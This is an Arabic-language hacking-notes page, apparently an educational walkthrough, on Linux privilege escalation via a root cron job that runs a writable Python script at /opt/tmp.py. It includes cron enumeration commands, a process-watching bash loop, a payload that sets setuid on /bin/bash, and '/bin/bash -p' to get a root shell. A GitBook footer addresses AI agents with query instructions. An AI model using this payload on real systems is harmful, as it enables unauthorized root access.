> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/ar/privesc/cron-jobs/modified-python-script-cron-job-linux-privilege-escalation.md).

# مهمة Cron لسكربت Python معدل - تصعيد امتيازات لينكس

## ما هو

تُنشئ مهام كرون مسارات لتصعيد الامتيازات عندما تنفّذ المهام الجذرية المتكررة نصوصًا برمجية قابلة للكتابة، أو مسارات نسبية غير آمنة، أو معالجات معرّضة للثغرات. المفتاح هو إثبات أن مستخدمًا منخفض الامتيازات يتحكم في شيء ستقوم مهمة مجدولة ذات امتيازات بتشغيله. تركز هذه الصفحة تحديدًا على **مهام كرون - نص برمجي معدّل (بايثون)** وتحافظ على سير الاستغلال بشكل عملي: حدّد الحالة، تحقّق منها بأمان، ثم شغّل أصغر حمولة لازمة لإثبات الأثر.

## الاستكشاف

ابدأ بتأكيد السياق المحلي والتهيئة الخاطئة الدقيقة قبل تشغيل مسار الاستغلال.

```bash
cat /etc/crontab
ls -la /etc/cron.*
systemctl list-timers --all
```

## أمثلة

ننشئ نص Bash لتحليل العمليات الحالية واكتشاف مهام كرون التي تعمل على الجهاز المستهدف:

```bash
#!/bin/bash

old_process=$(ps -eo user,command)

while true; do
	new_process=$(ps -eo user,command)
	diff <(echo "$old_process") <(echo "$new_process") | grep "[/>/<]" | grep -vE "script|command|kworker"
	old_process=$new_process
done
```

عند تشغيل هذا النص البرمجي، نلاحظ أن **root** المستخدم يشغّل نصًا برمجيًا بلغة بايثون موجودًا في `/opt/tmp.py` الدليل.

<figure><img src="/files/7504b73aa47849b75c1bae0b496aa5fdcfffaf1b" alt=""><figcaption></figcaption></figure>

لدينا إمكانية تعديل هذا النص البرمجي بلغة بايثون.

<figure><img src="/files/97a2eb633309fe9340e6dc9914083fe49551e782" alt=""><figcaption></figcaption></figure>

نعدّله لإضافة الأمر الذي يضبط **setuid** على الملف الثنائي `/bin/bash`، مما سيسمح لنا بتشغيل صدفة Bash بصلاحيات **root** مرتفعة:

```python
#!/usr/bin/env python
import os
import sys
try:
     os.system('chmod u+s /bin/bash')
except:
     sys.exit()
```

بعد تعديل النص البرمجي، ننتظر حوالي دقيقة حتى تُشغَّل مهمة كرون.

بمجرد تنفيذ مهمة كرون، يمكننا الحصول على صدفة Bash بصلاحيات **root** مرتفعة بتشغيل الأمر التالي:

```bash
/bin/bash -p
```

<figure><img src="/files/1906f629280b6e59d315c3cd76b6b8124f4eba75" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/ar/privesc/cron-jobs/modified-python-script-cron-job-linux-privilege-escalation.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
